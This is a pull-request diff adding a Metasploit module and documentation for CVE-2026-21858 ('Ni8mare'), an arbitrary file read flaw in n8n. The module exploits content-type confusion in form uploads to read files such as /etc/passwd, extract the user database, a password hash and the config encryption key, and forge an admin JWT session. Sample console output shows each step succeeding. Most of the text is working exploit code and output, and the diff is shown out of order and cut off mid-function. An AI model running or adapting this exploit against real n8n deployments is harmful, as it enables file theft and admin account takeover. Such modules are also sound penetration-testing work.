### PR TITLE
Adds module for Ni8mare (CVE-2026-21858)

### DIFF
--- a/documentation/modules/auxiliary/gather/ni8mare_cve_2026_21858.md
+++ b/documentation/modules/auxiliary/gather/ni8mare_cve_2026_21858.md
@@ -23,18 +23,74 @@ Talk about what it does, and how to use it appropriately. If the default value i
 ## Scenarios
 Specific demo of using the module that might be useful in a real world scenario.
 
-### Version and OS
+### File read
 
 ```
-code or console output
+msf auxiliary(gather/ni8mare_cve_2026_21858) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf auxiliary(gather/ni8mare_cve_2026_21858) > set RPORT 5678
+RPORT => 5678
+msf auxiliary(gather/ni8mare_cve_2026_21858) > set email admin@gmail.com
+email => admin@gmail.com
+msf auxiliary(gather/ni8mare_cve_2026_21858) > set password Supersecret9
+password => Supersecret9
+msf auxiliary(gather/ni8mare_cve_2026_21858) > set action READ_FILE
+saction => READ_FILE
+msf auxiliary(gather/ni8mare_cve_2026_21858) > set TARGET_FILENAME /etc/passwd
+rTARGET_FILENAME => /etc/passwd
+msf auxiliary(gather/ni8mare_cve_2026_21858) > run verbose=true
+[*] Running module against 127.0.0.1
+[*] Creating file upload workflow...
+[*] Cleaning up workflow s8d1du2IUfRXpicE...
+[+] Results saved to: /home/ms/.msf4/loot/20260204123428_default_127.0.0.1_etcpasswd_119553.txt
+[*] Auxiliary module execution completed
+msf auxiliary(gather/ni8mare_cve_2026_21858) > cat /home/ms/.msf4/loot/20260204123428_default_127.0.0.1_etcpasswd_119553.txt
+[*] exec: cat /home/ms/.msf4/loot/20260204123428_default_127.0.0.1_etcpasswd_119553.txt
+
+root:x:0:0:root:/root:/bin/sh
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/mail:/sbin/nologin
+news:x:9:13:news:/usr/lib/news:/sbin/nologin
+uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
+cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
+ftp:x:21:21::/var/lib/ftp:/sbin/nologin
+sshd:x:22:22:sshd:/dev/null:/sbin/nologin
+games:x:35:35:games:/usr/games:/sbin/nologin
+ntp:x:123:123:NTP:/var/empty:/sbin/nologin
+guest:x:405:100:guest:/dev/null:/sbin/nologin
+nobody:x:65534:65534:nobody:/:/sbin/nologin
+node:x:1000:1000::/home/node:/bin/sh
 ```
 
-For example:
-
-To do this specific thing, here's how you do it:
-
+### Session extraction
 ```
-msf > use module_name
-msf auxiliary(module_name) > set POWERLEVEL >9000
-msf auxiliary(module_name) > exploit
+msf auxiliary(gather/ni8mare_cve_2026_21858)> set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf auxiliary(gather/ni8mare_cve_2026_21858)> set RPORT 5678
+RPORT => 5678
+msf auxiliary(gather/ni8mare_cve_2026_21858)> set email admin@gmail.com
+email => admin@gmail.com
+msf auxiliary(gather/ni8mare_cve_2026_21858)> set password Supersecret9
+password => Supersecret9
+msf auxiliary(gather/ni8mare_cve_2026_21858)> set spoofed_email admin@gmail.com
+spoofed_email => admin@gmail.com
+msf auxiliary(gather/ni8mare_cve_2026_21858) > run verbose=true
+[*] Running module against 127.0.0.1
+[*] Creating file upload workflow...
+[*] Cleaning up workflow eEqTclj3rxAS1KCb...
+[+] Database saved to: /home/ms/.msf4/loot/20260204123341_default_127.0.0.1_database.sqlite_959168.bin
+[+] Extracted user ID: 9701b0fb-dcf0-4431-93f2-570dbe48b102
+[+] Extracted password hash: $2a$10$J7g5lE6/8P5K/58PR2YC..c0g02QEU5MTsFWqhUqf4.3p7sBrM4oW
+[*] Creating file upload workflow...
+[*] Cleaning up workflow uBmS93fou1Xw2554...
+[+] Config file saved to: /home/ms/.msf4/loot/20260204123345_default_127.0.0.1_n8n.config_124017.bin
+[+] Extracted encryption key: vEg+NXiKzB+E0w7isnvcM7TauaTwM4QF
+eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
+[+] JWT ticket as admin@gmail.com: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6Ijk3MDFiMGZiLWRjZjAtNDQzMS05M2YyLTU3MGRiZTQ4YjEwMiIsImhhc2giOiJMdzhCVHJKcEhRIn0.sxIbgD9ShEGvHbax2nbHHYv3CBXGLeNlx1dGbCCPttw
+[*] Auxiliary module execution completed
 ```

--- a/documentation/modules/auxiliary/gather/ni8mare_cve_2026_21858.md
+++ b/documentation/modules/auxiliary/gather/ni8mare_cve_2026_21858.md
@@ -12,6 +12,8 @@ the same time. This module tries to use the CVE for different scenarios - privil
 where a low-privileged user is allowed to read an arbitrary file and eventually gain admin access
 by forging a ticket.
 
+To start vulnerable n8n container, run: `docker run -p5678:5678 n8nio/n8n:1.120.0`
+
 ## Verification Steps
 
 1. Install the vulnerable n8n instance

--- a/documentation/modules/auxiliary/gather/ni8mare_cve_2026_21858.md
+++ b/documentation/modules/auxiliary/gather/ni8mare_cve_2026_21858.md
@@ -1,27 +1,47 @@
 ## Vulnerable Application
 
-Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
-files, as well as instructions on installing/configuring the environment if it is different than a
-standard install. Much of this will come from the PR, and can be copy/pasted.
+This module exploits CVE-2026-21858, a critical unauthenticated remote code execution vulnerability
+in the n8n workflow automation platform versions 1.65.0 through 1.120.x. The vulnerability, dubbed
+"Ni8mare", is a content-type confusion flaw in webhook request handling that allows attackers to
+achieve arbitrary file read. According to the published write-up, this CVE can be used to attain
+unauthenticated RCE; however, that requires additional steps. The unauthenticated file read is
+bound by two conditions: a way to extract the loaded file (either via an exposed chatbot or another
+means) and an exposed file upload form. Those conditions are
+[rarely actual](https://horizon3.ai/attack-research/attack-blogs/the-ni8mare-test-n8n-rce-under-the-microscope-cve-2026-21858/) at
+the same time. This module tries to use the CVE for different scenarios - privilege escalation,
+where a low-privileged user is allowed to read an arbitrary file and eventually gain admin access
+by forging a ticket.
 
 ## Verification Steps
-Example steps in this format (is also in the PR):
 
-1. Install the application
+1. Install the vulnerable n8n instance
 1. Start msfconsole
-1. Do: `use [module path]`
+1. Do: `use auxiliary/gather/ni8mare_cve_2026_21858`
+1. Do: `set USERNAME [username]`
+1. Do: `set PASSWORD [password]`
+1. Do: `set ACTION [EXTRACT_SESSION/READ_FILE]`
+1. Do: `set SPOOFED_USERNAME [username]` or `set TARGET_FILENAME [username]`
 1. Do: `run`
-1. You should get a shell.
 
 ## Options
-List each option and how to use it.
 
-### Option Name
+### EMAIL
 
-Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
+Email of user, which will create a malicious workflow to execute arbitrary file read.
+
+### PASSWORD
+
+Password of user, which will create a malicious workflow to execute arbitrary file read.
+
+## SPOOFED_EMAIL
+
+If EXTRACT_SESSION action is set, the SPOOFED_EMAIL defines a user for which a spoofed session will be created.
+
+## TARGET_FILENAME
+
+If READ_FILE action is set, this option represent a file, whose content will be extracted.
 
 ## Scenarios
-Specific demo of using the module that might be useful in a real world scenario.
 
 ### File read
 

--- a/documentation/modules/auxiliary/gather/ni8mare_cve_2026_21858.md
+++ b/documentation/modules/auxiliary/gather/ni8mare_cve_2026_21858.md
@@ -1,0 +1,40 @@
+## Vulnerable Application
+
+Instructions to get the vulnerable application. If applicable, include links to the vulnerable install
+files, as well as instructions on installing/configuring the environment if it is different than a
+standard install. Much of this will come from the PR, and can be copy/pasted.
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use [module path]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+List each option and how to use it.
+
+### Option Name
+
+Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here.
+
+## Scenarios
+Specific demo of using the module that might be useful in a real world scenario.
+
+### Version and OS
+
+```
+code or console output
+```
+
+For example:
+
+To do this specific thing, here's how you do it:
+
+```
+msf > use module_name
+msf auxiliary(module_name) > set POWERLEVEL >9000
+msf auxiliary(module_name) > exploit
+```

--- a/documentation/modules/auxiliary/gather/ni8mare_cve_2026_21858.md
+++ b/documentation/modules/auxiliary/gather/ni8mare_cve_2026_21858.md
@@ -43,6 +43,10 @@ If EXTRACT_SESSION action is set, the SPOOFED_EMAIL defines a user for which a s
 
 If READ_FILE action is set, this option represent a file, whose content will be extracted.
 
+## N8N_CONFIG_DIR
+
+Absolute path to config directory for n8n.
+
 ## Scenarios
 
 ### File read

--- a/lib/msf/core/exploit/remote/http/jwt.rb
+++ b/lib/msf/core/exploit/remote/http/jwt.rb
@@ -18,16 +18,13 @@ class Msf::Exploit::Remote::HTTP::JWT
   def self.encode(payload, key, algorithm = 'HS256', header_fields = {})
     
     header = %<{"alg":"#{algorithm}","typ":"JWT"}>
-
-    #header = Rex::Text.encode_base64(header)
     header = Base64.urlsafe_encode64(header)
 
     payload = payload
-    #payload = Rex::Text.encode_base64(payload)
     payload = Base64.urlsafe_encode64(payload)
-
     
-    signature = OpenSSL::HMAC.hexdigest("SHA256", key, "#{header}.#{payload}")
+    signature = OpenSSL::HMAC.digest("SHA256", key, "#{header}.#{payload}")
+    signature = Base64.urlsafe_encode64(signature)
 
     "#{header}.#{payload}.#{signature}"
 

--- a/lib/msf/core/exploit/remote/http/jwt.rb
+++ b/lib/msf/core/exploit/remote/http/jwt.rb
@@ -15,20 +15,24 @@ class Msf::Exploit::Remote::HTTP::JWT
     @signature = signature
   end
 
-  def self.encode(payload, key, algorithm = 'HS256', header_fields = {})
-    
-    header = %<{"alg":"#{algorithm}","typ":"JWT"}>
-    header = Base64.urlsafe_encode64(header)
+  def self.base64_url(data)
+    Base64.urlsafe_encode64(data).gsub('=', '')
+  end
 
-    payload = payload
-    payload = Base64.urlsafe_encode64(payload)
-    
-    signature = OpenSSL::HMAC.digest("SHA256", key, "#{header}.#{payload}")
-    signature = Base64.urlsafe_encode64(signature)
+  def self.encode(payload, key, algorithm = 'HS256', header_fields = {})
+    header = base64_url(%({"alg":"#{algorithm}","typ":"JWT"}))
+    puts header
+
+    payload = base64_url(payload)
+
+    case algorithm
+    when 'HS256'
+      signature = base64_url(OpenSSL::HMAC.digest('SHA256', key, "#{header}.#{payload}"))
+    else
+      raise NotImplementedError, "#{algorithm} currently not supported"
+    end
 
     "#{header}.#{payload}.#{signature}"
-
-    #raise NotImplementedError
   end
 
   def self.decode(jwt, _key = nil, _verify = true, _options = {})
@@ -38,6 +42,6 @@ class Msf::Exploit::Remote::HTTP::JWT
     header = JSON.parse(Rex::Text.decode_base64(header))
     payload = JSON.parse(Rex::Text.decode_base64(payload))
 
-    self.new(payload: payload, header: header, signature: signature)
+    new(payload: payload, header: header, signature: signature)
   end
 end

--- a/lib/msf/core/exploit/remote/http/jwt.rb
+++ b/lib/msf/core/exploit/remote/http/jwt.rb
@@ -15,17 +15,17 @@ class Msf::Exploit::Remote::HTTP::JWT
 
   def self.encode(payload, key, algorithm = 'HS256', header_fields = {})
     
-    self.header = { "alg": algorithm, "typ": "JWT"}
-    self.header = self.header.to_s
-    self.header = Rex::Text.encode_base64(self.header)
+    header = { "alg" => algorithm, "typ"=>"JWT"}
+    header = header.to_s
+    header = Rex::Text.encode_base64(header)
 
-    self.payload = payload
-    self.payload = Rex::Text.encode_base64(self.payload)
+    payload = payload
+    payload = Rex::Text.encode_base64(payload)
 
     
-    self.signature = OpenSSL::HMAC.hexdigest("SHA256", key, "#{self.header}.#{self.payload}")
+    signature = OpenSSL::HMAC.hexdigest("SHA256", key, "#{header}.#{payload}")
 
-    "#{self.header}.#{self.payload}.#{self.signature}"
+    "#{header}.#{payload}.#{signature}"
 
     #raise NotImplementedError
   end

--- a/lib/msf/core/exploit/remote/http/jwt.rb
+++ b/lib/msf/core/exploit/remote/http/jwt.rb
@@ -4,6 +4,8 @@
 # Note that swapping this out for a third-party gem will work, but
 # there may be potential security issues with the key id (kid) claim etc,
 # which would need to be reviewed.
+require 'base64'
+
 class Msf::Exploit::Remote::HTTP::JWT
   attr_reader :payload, :header, :signature
 
@@ -15,12 +17,14 @@ class Msf::Exploit::Remote::HTTP::JWT
 
   def self.encode(payload, key, algorithm = 'HS256', header_fields = {})
     
-    header = { "alg" => algorithm, "typ"=>"JWT"}
-    header = header.to_s
-    header = Rex::Text.encode_base64(header)
+    header = %<{"alg":"#{algorithm}","typ":"JWT"}>
+
+    #header = Rex::Text.encode_base64(header)
+    header = Base64.urlsafe_encode64(header)
 
     payload = payload
-    payload = Rex::Text.encode_base64(payload)
+    #payload = Rex::Text.encode_base64(payload)
+    payload = Base64.urlsafe_encode64(payload)
 
     
     signature = OpenSSL::HMAC.hexdigest("SHA256", key, "#{header}.#{payload}")

--- a/lib/msf/core/exploit/remote/http/jwt.rb
+++ b/lib/msf/core/exploit/remote/http/jwt.rb
@@ -21,7 +21,6 @@ class Msf::Exploit::Remote::HTTP::JWT
 
   def self.encode(payload, key, algorithm = 'HS256', header_fields = {})
     header = base64_url(%({"alg":"#{algorithm}","typ":"JWT"}))
-    puts header
 
     payload = base64_url(payload)
 

--- a/lib/msf/core/exploit/remote/http/jwt.rb
+++ b/lib/msf/core/exploit/remote/http/jwt.rb
@@ -14,7 +14,20 @@ class Msf::Exploit::Remote::HTTP::JWT
   end
 
   def self.encode(payload, key, algorithm = 'HS256', header_fields = {})
-    raise NotImplementedError
+    
+    self.header = { "alg": algorithm, "typ": "JWT"}
+    self.header = self.header.to_s
+    self.header = Rex::Text.encode_base64(self.header)
+
+    self.payload = payload
+    self.payload = Rex::Text.encode_base64(self.payload)
+
+    
+    self.signature = OpenSSL::HMAC.hexdigest("SHA256", key, "#{self.header}.#{self.payload}")
+
+    "#{self.header}.#{self.payload}.#{self.signature}"
+
+    #raise NotImplementedError
   end
 
   def self.decode(jwt, _key = nil, _verify = true, _options = {})

--- a/modules/auxiliary/admin/http/ni8mare_cve_2026_21858.rb
+++ b/modules/auxiliary/admin/http/ni8mare_cve_2026_21858.rb
@@ -1,0 +1,73 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+###
+#
+# This sample auxiliary module simply displays the selected action and
+# registers a custom command that will show up when the module is used.
+#
+###
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'n8n arbitrary file read',
+        'Description' => 'TODO',
+        'Author' => [
+          'dor attias', # research
+          'msutovsky-r7' # module
+        ],
+        'License' => MSF_LICENSE,
+        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+    register_options([
+      OptString.new('FORM_URI', [true, 'n8n form URI', ''])
+    ])
+  end
+
+  def content_type_confusion_upload(filename)
+    json_data = {
+      files: {
+        "field-0":
+        {
+          filepath: filename,
+          originalFilename: 'product.pdf',
+          mimeType: 'text/plain',
+          extenstion: ''
+        }
+      },
+      data: [
+        'not really important'
+      ],
+      executionId: 'not really important'
+    }
+    send_request_cgi({
+      'uri' => normalize_uri(datastore['FORM_URI']),
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => json_data.to_json
+    })
+
+    fail_with(Failure::UnexpectedReply, 'Received unexpected response') unless res&.code == 200
+
+    res.get_json_document
+
+    fail_with(Failure::PayloadFailed, 'Failed to load target file') unless json_res['status'] != 200
+  end
+
+  def run
+    content_type_confusion_upload('/etc/passwd')
+  end
+
+end

--- a/modules/auxiliary/gather/ni8mare_cve_2026_21858.rb
+++ b/modules/auxiliary/gather/ni8mare_cve_2026_21858.rb
@@ -331,9 +331,12 @@ class MetasploitModule < Msf::Auxiliary
       encryption_key = config_content_json['encryptionKey']
 
       print_good("Extracted encryption key: #{encryption_key}")
+      
+      encryption_key = (1...encryption_key.length).step(2).map { |i| encryption_key[i] }
+      encryption_key = encryption_key.join('')
 
-      jwt_payload = %({"id":"#{user_id}","hash":"#{Base64.urlsafe_encode64(Digest::SHA256.digest("#{target_username}:#{password_hash}"))[0..10]}"})
-      jwt_ticket = Msf::Exploit::Remote::HTTP::JWT.encode(jwt_payload.to_s, encryption_key)
+      jwt_payload = %({"id":"#{user_id}","hash":"#{Base64.urlsafe_encode64(Digest::SHA256.digest("#{target_username}:#{password_hash}"))[0..9]}","browserId":"VCuSIVFScjl4/6T8sqP/P8YG3Ru9iVsubJmnztmPuLA=","usedMfa":false,"iat":1770130254,"exp":1770735054})
+      jwt_ticket = Msf::Exploit::Remote::HTTP::JWT.encode(jwt_payload.to_s, OpenSSL::Digest::SHA256.hexdigest(encryption_key))
 
       print_good("JWT ticket as #{target_username}: #{jwt_ticket}")
 

--- a/modules/auxiliary/gather/ni8mare_cve_2026_21858.rb
+++ b/modules/auxiliary/gather/ni8mare_cve_2026_21858.rb
@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Auxiliary
           ['READ_FILE', { 'Description' => 'Read an arbitrary file from the target' }],
           ['EXTRACT_SESSION', { 'Description' => 'Create admin JWT sessio key by reading out secrets' }]
         ],
-        'DefaultAction' => 'EXTRACT_ADMIN_SESSION',
+        'DefaultAction' => 'EXTRACT_SESSION',
         'License' => MSF_LICENSE,
         'Notes' => {
           'Stability' => [CRASH_SAFE],

--- a/modules/auxiliary/gather/ni8mare_cve_2026_21858.rb
+++ b/modules/auxiliary/gather/ni8mare_cve_2026_21858.rb
@@ -7,7 +7,7 @@ require 'sqlite3'
 class MetasploitModule < Msf::Auxiliary
 
   include Msf::Exploit::Remote::HttpClient
-  include Rex::Proto::Http::WebSocket
+  include Msf::Exploit::Remote::HTTP::JWT
 
   def initialize(info = {})
     super(
@@ -332,6 +332,10 @@ class MetasploitModule < Msf::Auxiliary
       encryption_key = config_content_json['encryptionKey']
 
       print_good("Extracted encryption key: #{encryption_key}")
+      jwt_payload = { id: user_id, hash: Digest::SHA256.digest("#{target_username}#{password_hash}") }
+      jwt_ticket = Msf::Exploit::Remote::HTTP::JWT.encode(jwt_payload.to_s, encryption_key)
+
+      print_good("JWT ticket as #{target_username}: #{jwt_ticket}")
 
     end
   end

--- a/modules/auxiliary/gather/ni8mare_cve_2026_21858.rb
+++ b/modules/auxiliary/gather/ni8mare_cve_2026_21858.rb
@@ -331,7 +331,7 @@ class MetasploitModule < Msf::Auxiliary
       encryption_key = config_content_json['encryptionKey']
 
       print_good("Extracted encryption key: #{encryption_key}")
-      
+
       encryption_key = (1...encryption_key.length).step(2).map { |i| encryption_key[i] }
       encryption_key = encryption_key.join('')
 

--- a/modules/auxiliary/gather/ni8mare_cve_2026_21858.rb
+++ b/modules/auxiliary/gather/ni8mare_cve_2026_21858.rb
@@ -331,7 +331,8 @@ class MetasploitModule < Msf::Auxiliary
       encryption_key = config_content_json['encryptionKey']
 
       print_good("Extracted encryption key: #{encryption_key}")
-      jwt_payload = { 'id' => user_id, 'hash' => Digest::SHA256.digest("#{target_username}#{password_hash}") }
+
+      jwt_payload = %({"id":"#{user_id}","hash":"#{Base64.urlsafe_encode64(Digest::SHA256.digest("#{target_username}:#{password_hash}"))[0..10]}"})
       jwt_ticket = Msf::Exploit::Remote::HTTP::JWT.encode(jwt_payload.to_s, encryption_key)
 
       print_good("JWT ticket as #{target_username}: #{jwt_ticket}")

--- a/modules/auxiliary/gather/ni8mare_cve_2026_21858.rb
+++ b/modules/auxiliary/gather/ni8mare_cve_2026_21858.rb
@@ -3,12 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-###
-#
-# This sample auxiliary module simply displays the selected action and
-# registers a custom command that will show up when the module is used.
-#
-###
 class MetasploitModule < Msf::Auxiliary
 
   include Msf::Exploit::Remote::HttpClient

--- a/modules/auxiliary/gather/ni8mare_cve_2026_21858.rb
+++ b/modules/auxiliary/gather/ni8mare_cve_2026_21858.rb
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary
       update_info(
         info,
         'Name' => 'n8n arbitrary file read',
-        'Description' => '#TODO',
+        'Description' => 'This module exploits CVE-2026-21858, a critical unauthenticated remote code execution vulnerability in n8n workflow automation platform versions 1.65.0 through 1.120.x. The vulnerability, dubbed "Ni8mare", is a content-type confusion flaw in webhook request handling that allows attackers to achieve arbitrary file read.',
         'Author' => [
           'dor attias', # research
           'msutovsky-r7' # module

--- a/modules/auxiliary/gather/ni8mare_cve_2026_21858.rb
+++ b/modules/auxiliary/gather/ni8mare_cve_2026_21858.rb
@@ -327,15 +327,20 @@ class MetasploitModule < Msf::Auxiliary
       print_good("Extracted password hash: #{password_hash}")
 
       config_content = read_file('/home/node/.n8n/config')
+
+      config_name = store_loot('n8n.config', 'plain/text', datastore['rhosts'], config_content)
+      print_good("Config file saved to: #{config_name}")
+
       config_content_json = JSON.parse(config_content)
       encryption_key = config_content_json['encryptionKey']
 
       print_good("Extracted encryption key: #{encryption_key}")
 
-      encryption_key = (1...encryption_key.length).step(2).map { |i| encryption_key[i] }
+      encryption_key = (0...encryption_key.length).step(2).map { |i| encryption_key[i] }
       encryption_key = encryption_key.join('')
 
-      jwt_payload = %({"id":"#{user_id}","hash":"#{Base64.urlsafe_encode64(Digest::SHA256.digest("#{target_username}:#{password_hash}"))[0..9]}","browserId":"VCuSIVFScjl4/6T8sqP/P8YG3Ru9iVsubJmnztmPuLA=","usedMfa":false,"iat":1770130254,"exp":1770735054})
+      jwt_payload = %({"id":"#{user_id}","hash":"#{Base64.urlsafe_encode64(Digest::SHA256.digest("#{target_username}:#{password_hash}"))[0..9]}"})
+
       jwt_ticket = Msf::Exploit::Remote::HTTP::JWT.encode(jwt_payload.to_s, OpenSSL::Digest::SHA256.hexdigest(encryption_key))
 
       print_good("JWT ticket as #{target_username}: #{jwt_ticket}")

--- a/modules/auxiliary/gather/ni8mare_cve_2026_21858.rb
+++ b/modules/auxiliary/gather/ni8mare_cve_2026_21858.rb
@@ -2,10 +2,13 @@
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
+require 'sqlite3'
 
 class MetasploitModule < Msf::Auxiliary
-
+  
   include Msf::Exploit::Remote::HttpClient
+  include Rex::Proto::Http::WebSocket
+
   def initialize(info = {})
     super(
       update_info(
@@ -16,8 +19,12 @@ class MetasploitModule < Msf::Auxiliary
           'dor attias', # research
           'msutovsky-r7' # module
         ],
+        'Actions' => [
+          ['READ_FILE', { 'Description' => 'Read an arbitrary file from the target' }],
+          ['EXTRACT_ADMIN_SESSION', { 'Description' => 'Create admin JWT sessio key by reading out secrets' }]
+        ],
+        'DefaultAction' => 'EXTRACT_ADMIN_SESSION',
         'License' => MSF_LICENSE,
-        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
         'Notes' => {
           'Stability' => [],
           'Reliability' => [],
@@ -26,28 +33,32 @@ class MetasploitModule < Msf::Auxiliary
       )
     )
     register_options([
-      OptString.new('FORM_URI', [true, 'n8n form URI', ''])
+      OptString.new('SPOOFED_USERNAME', [false, 'Username of n8n']),
+      OptString.new('FILENAME', [false, 'Username of n8n']),
+      OptString.new('USERNAME', [true, 'Username of n8n', '']),
+      OptString.new('PASSWORD', [true, 'Password of n8n', ''])
     ])
   end
 
-  def content_type_confusion_upload(filename)
+  def content_type_confusion_upload(form_uri, filename)
+    extraction_filename = "#{Rex::Text.rand_text_alpha(rand(8..11))}.pdf"
     json_data = {
       files: {
         "field-0":
         {
           filepath: filename,
-          originalFilename: 'product.pdf',
+          originalFilename: extraction_filename,
           mimeType: 'text/plain',
           extenstion: ''
         }
       },
       data: [
-        'not really important'
+        Rex::Text.rand_text_alpha(12)
       ],
-      executionId: 'not really important'
+      executionId: Rex::Text.rand_text_alpha(12)
     }
-    send_request_cgi({
-      'uri' => normalize_uri(datastore['FORM_URI']),
+    res = send_request_cgi({
+      'uri' => normalize_uri('form-test',form_uri),
       'method' => 'POST',
       'ctype' => 'application/json',
       'data' => json_data.to_json
@@ -55,13 +66,253 @@ class MetasploitModule < Msf::Auxiliary
 
     fail_with(Failure::UnexpectedReply, 'Received unexpected response') unless res&.code == 200
 
-    res.get_json_document
+    json_res = res.get_json_document
 
-    fail_with(Failure::PayloadFailed, 'Failed to load target file') unless json_res['status'] != 200
+    fail_with(Failure::PayloadFailed, 'Failed to load target file') unless json_res['status'] != '200'
   end
 
+  def login
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'rest', 'login'),
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'data' => {
+        'emailOrLdapLoginId' => datastore['USERNAME'],
+        'email' => datastore['USERNAME'],
+        'password' => datastore['PASSWORD']
+      }.to_json
+    )
+
+    return true if res&.code == 200
+
+    json_data = res.get_json_document
+
+    print_error("Login failed: #{json_data['message']}")
+
+    false
+  end
+
+  def create_file_upload_workflow
+    @workflow_name = "workflow_#{Rex::Text.rand_text_alphanumeric(8)}"
+
+    workflow_data = {
+      'name' => @workflow_name,
+      'active' => false,
+      'settings' => {
+        'saveDataErrorExecution' => 'all',
+        'saveDataSuccessExecution' => 'all',
+        'saveManualExecutions' => true,
+        'executionOrder' => 'v1'
+      },
+      nodes: [
+        {
+          parameters: {
+            formTitle: 'Superform',
+            formFields: {
+              values: [
+                {
+                  fieldLabel: 'Superfield',
+                  fieldType: 'file'
+                }
+              ]
+            },
+            options: {}
+          },
+          type: 'n8n-nodes-base.formTrigger',
+          typeVersion: 2.3,
+          position: [0, 0],
+          id: 'e4f12efa-9975-4041-b71f-0ce4999ec5a7',
+          name: 'On form submission',
+          webhookId: '594fbf70-b077-41e0-89b6-b9dc856cd370'
+        }
+      ],
+      'connections' => {},
+      settings: { executionOrder: 'v1' }
+    }
+
+    print_status('Creating file upload workflow...')
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'rest', 'workflows'),
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'data' => workflow_data.to_json
+    )
+    fail_with(Failure::UnexpectedReply, "Failed to create workflow: #{res&.code}") unless res&.code == 200 || res&.code == 201
+
+    json = res.get_json_document
+
+    @workflow_id = json.dig('data', 'id') || json['id']
+    nodes = json.dig('data', 'nodes')
+    version_id = json.dig('data', 'versionId')
+    id = json.dig('data', 'id')
+
+    fail_with(Failure::UnexpectedReply, 'Failed to get workflow ID from response') unless @workflow_id && nodes && version_id && id
+
+    activation_data = {
+      'workflowData' => {
+        'name' => @workflow_name,
+        'nodes' => nodes,
+        'pinData' => {},
+        'connections' => {},
+        'active' => false,
+        'settings' => {
+          'saveDataErrorExecution' => 'all',
+          'saveDataSuccessExecution' => 'all',
+          'saveManualExecutions' => true,
+          'executionOrder' => 'v1'
+        },
+        'tags' => [],
+        'versionId' => version_id,
+        'meta' => 'null',
+        'id' => id
+      },
+      startNodes: [
+        {
+          name: 'On form submission',
+          sourceData: 'null'
+        }
+      ],
+      destinationNode: 'On form submission'
+    }
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', @workflow_id.to_s, 'run'),
+      'ctype' => 'application/json',
+      'keep_cookies' => true,
+      'data' => activation_data.to_json
+    )
+    
+    fail_with(Failure::PayloadFailed, "Failed to run file upload") unless res&.code == 200
+    
+    json_data = res.get_json_document
+
+    fail_with(Failure::PayloadFailed, "Failed to run file upload") unless json_data.dig('data','waitingForWebhook') == true
+    '594fbf70-b077-41e0-89b6-b9dc856cd370' 
+  end
+  
+  def get_execution_id
+  
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri('rest','executions'),
+      'vars_get' => 
+      {
+        'filter' => %<{"workflowId":"#{@workflow_id}"}>,
+        'limit' => 10
+      }
+    })
+    fail_with(Failure::PayloadFailed, "") unless res&.code == 200;
+    
+    json_data = res.get_json_document
+
+    run_id = json_data.dig('data','results',0,'id')
+    fail_with(Failure::PayloadFailed, "") unless run_id
+
+    run_id
+  end
+
+
+  def archive_workflow
+    print_status("Cleaning up workflow #{@workflow_id}...")
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', @workflow_id.to_s, 'archive'),
+      'keep_cookies' => true
+    )
+  end
+
+  def delete_workflow
+      send_request_cgi(
+        'method' => 'DELETE',
+        'uri' => normalize_uri(target_uri.path, 'rest', 'workflows', @workflow_id.to_s)
+      )
+  end
+
+  def extract_content(run_id)
+  
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri('rest','executions',run_id)
+    })
+
+    fail_with(Failure::PayloadFailed, "") unless res&.code == 200
+
+    json_data = res.get_json_document
+    
+    file_data = json_data.dig('data','data')
+    
+    fail_with(Failure::PayloadFailed, "") unless file_data
+
+    #TODO: add begin block
+
+    parsed_file_data = JSON.parse(file_data)
+    
+    file_content_enc = parsed_file_data[29]
+
+    file_content = ::Base64.decode64(file_content_enc)
+
+    file_content
+
+  end
+  
+  def read_file(filename)
+  
+    form_uri = create_file_upload_workflow
+
+    content_type_confusion_upload(form_uri, filename)
+   
+    run_id = get_execution_id
+
+    file_content = extract_content(run_id)
+    
+    archive_workflow
+
+    delete_workflow
+
+    file_content
+  end
+
+  def check; end
+
   def run
-    content_type_confusion_upload('/etc/passwd')
+    fail_with(Failure::NoAccess, 'Failed to login') unless login
+    
+    case action.name
+      when 'READ_FILE'
+        
+        puts read_file(datastore['FILENAME'])
+
